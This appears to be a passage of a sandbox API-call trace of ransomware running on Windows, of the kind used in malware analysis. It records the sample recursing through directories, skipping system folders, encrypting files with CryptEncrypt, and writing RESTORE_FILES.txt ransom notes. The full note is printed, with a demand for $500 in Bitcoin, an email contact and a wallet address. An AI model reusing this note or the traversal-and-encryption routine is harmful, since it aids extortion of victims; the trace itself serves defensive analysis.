[0064.305] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0 [0064.305] FindClose (in: hFindFile=0x494b80 | out: hFindFile=0x494b80) returned 1 [0064.305] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\RESTORE_FILES.txt") returned 39 [0064.305] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\RESTORE_FILES.txt" (normalized: "c:\\perflogs\\admin\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0064.306] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.306] WriteFile (in: hFile=0xac, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f3e4*=0x53d, lpOverlapped=0x0) returned 1 [0064.307] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0064.307] WriteFile (in: hFile=0xac, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f3e4*=0x2ac, lpOverlapped=0x0) returned 1 [0064.307] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.307] WriteFile (in: hFile=0xac, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f3e4*=0xb1, lpOverlapped=0x0) returned 1 [0064.307] CloseHandle (hObject=0xac) returned 1 [0064.308] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0 [0064.308] FindClose (in: hFindFile=0x447b60 | out: hFindFile=0x447b60) returned 1 [0064.308] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\PerfLogs\\RESTORE_FILES.txt") returned 33 [0064.308] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\RESTORE_FILES.txt" (normalized: "c:\\perflogs\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0064.308] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0064.308] WriteFile (in: hFile=0xa0, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f654*=0x53d, lpOverlapped=0x0) returned 1 [0064.309] lstrlenA (lpString="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") returned 684 [0064.309] WriteFile (in: hFile=0xa0, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f654*=0x2ac, lpOverlapped=0x0) returned 1 [0064.310] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0064.310] WriteFile (in: hFile=0xa0, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f654, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f654*=0xb1, lpOverlapped=0x0) returned 1 [0064.310] CloseHandle (hObject=0xa0) returned 1 [0064.310] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.310] lstrcmpiW (lpString1="Program Files", lpString2="Windows") returned -1 [0064.310] lstrcmpiW (lpString1="Program Files", lpString2="Program Files") returned 0 [0064.310] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.310] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Windows") returned -1 [0064.310] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Program Files") returned 1 [0064.310] lstrcmpiW (lpString1="Program Files (x86)", lpString2="Program Files (x86)") returned 0 [0064.310] FindNextFileW (in: hFindFile=0x4472f8, lpFindFileData=0x295f8e0 | out: lpFindFileData=0x295f8e0) returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="Windows") returned -1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="Program Files") returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="Program Files (x86)") returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="$Recycle.bin") returned 1 [0064.310] lstrcmpiW (lpString1="ProgramData", lpString2="System Volume Information") returned -1 [0064.310] wnsprintfW (in: pszDest=0x4484b8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\ProgramData") returned 18 [0064.310] lstrcmpW (lpString1="ProgramData", lpString2=".") returned 1 [0064.310] lstrcmpW (lpString1="ProgramData", lpString2="..") returned 1 [0064.310] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\*") returned 20 [0064.310] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 0x447b60 [0064.311] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.311] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.311] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.311] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.311] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.311] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\.") returned 20 [0064.311] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.311] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0064.311] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0064.311] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0064.311] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x30) returned 1 [0064.311] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\." 
(normalized: "c:\\programdata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.311] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.311] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.311] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.311] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.311] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.311] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.311] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\..") returned 21 [0064.311] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.311] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.311] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0064.311] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0064.311] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f60c | out: pbBuffer=0x295f60c) returned 1 [0064.311] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f634*=0x30) returned 1 [0064.312] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\.." 
(normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.312] FindNextFileW (in: hFindFile=0x447b60, lpFindFileData=0x295f670 | out: lpFindFileData=0x295f670) returned 1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="Windows") returned -1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="Program Files") returned -1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="Program Files (x86)") returned -1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="$Recycle.bin") returned 1 [0064.312] lstrcmpiW (lpString1="Adobe", lpString2="System Volume Information") returned -1 [0064.312] wnsprintfW (in: pszDest=0x459508, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe") returned 24 [0064.312] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0064.312] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0064.312] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\*") returned 26 [0064.312] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 0x494b80 [0064.312] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.312] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.312] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.312] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.312] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.312] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\.") returned 26 [0064.312] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.312] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.312] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.312] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.312] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.313] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.313] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.313] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\..") returned 27 [0064.313] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.313] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.313] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="Windows") returned -1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files") returned -1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="Program Files (x86)") returned -1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="$Recycle.bin") returned 1 [0064.313] lstrcmpiW (lpString1="Acrobat", lpString2="System Volume Information") returned -1 [0064.313] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat") returned 32 [0064.313] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0064.313] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0064.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*") returned 34 [0064.313] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0064.313] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.313] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.313] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") 
returned -1 [0064.313] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.313] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.313] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\.") returned 34 [0064.313] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.313] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.313] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.314] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\..") returned 35 [0064.314] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.314] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.314] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="Program Files") returned -1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="Program Files (x86)") returned -1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="$Recycle.bin") returned 1 [0064.314] lstrcmpiW (lpString1="10.0", lpString2="System Volume Information") returned -1 [0064.314] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0") returned 37 [0064.314] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0064.314] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0064.314] 
wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*") returned 39 [0064.314] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0064.314] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.314] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.314] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.314] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.314] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\.") returned 39 [0064.314] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.314] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.314] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.315] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.315] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.315] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.315] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\..") returned 40 [0064.315] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.315] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.315] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="Windows") returned -1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="Program Files") returned 1 
[0064.315] lstrcmpiW (lpString1="Replicate", lpString2="Program Files (x86)") returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="$Recycle.bin") returned 1 [0064.315] lstrcmpiW (lpString1="Replicate", lpString2="System Volume Information") returned -1 [0064.315] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate") returned 47 [0064.315] lstrcmpW (lpString1="Replicate", lpString2=".") returned 1 [0064.315] lstrcmpW (lpString1="Replicate", lpString2="..") returned 1 [0064.315] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*") returned 49 [0064.315] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0064.686] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.686] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.686] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.686] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.686] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.686] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\.") returned 49 [0064.686] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.686] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0064.686] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.686] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.686] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.686] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.686] lstrcmpiW (lpString1="..", 
lpString2="System Volume Information") returned -1 [0064.686] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\..") returned 50 [0064.686] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.686] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.686] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="Windows") returned -1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="Program Files") returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="Program Files (x86)") returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="$Recycle.bin") returned 1 [0064.686] lstrcmpiW (lpString1="Security", lpString2="System Volume Information") returned -1 [0064.686] wnsprintfW (in: pszDest=0x4c0b28, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 56 [0064.686] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0064.686] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*") returned 58 [0064.687] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x4a9210 [0064.687] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0064.687] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0064.687] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0064.687] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0064.687] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\.") returned 58 [0064.687] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0064.687] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0064.687] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0064.687] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0064.687] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0064.687] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0064.687] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\..") returned 59 [0064.687] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0064.687] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0064.687] FindNextFileW (in: hFindFile=0x4a9210, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="Windows") returned -1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="Program Files") returned -1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="Program Files (x86)") returned -1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="$Recycle.bin") returned 1 [0064.687] lstrcmpiW (lpString1="directories.acrodata", lpString2="System Volume Information") returned -1 [0064.687] wnsprintfW (in: pszDest=0x4d1b78, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.687] StrStrIW (lpFirst="directories.acrodata", lpSrch=".protected") returned 0x0 [0064.688] lstrcmpW (lpString1="directories.acrodata", lpString2="RESTORE_FILES.txt") returned -1 
[0064.688] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0064.688] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x4a9250*, pdwDataLen=0x295ea04*=0x30) returned 1 [0064.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0064.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.688] StrStrW (lpFirst="directories.acrodata", lpSrch=".txt") returned 0x0 [0064.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.688] StrStrW (lpFirst="directories.acrodata", lpSrch=".rar") returned 0x0 [0064.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata") returned 77 [0064.688] StrStrW (lpFirst="directories.acrodata", lpSrch=".zip") returned 0x0 [0064.688] ReadFile (in: hFile=0x14c, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295ea24*=0x1df, lpOverlapped=0x0) returned 1 [0064.689] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffffe21, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0064.689] WriteFile (in: hFile=0x14c, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x1df, 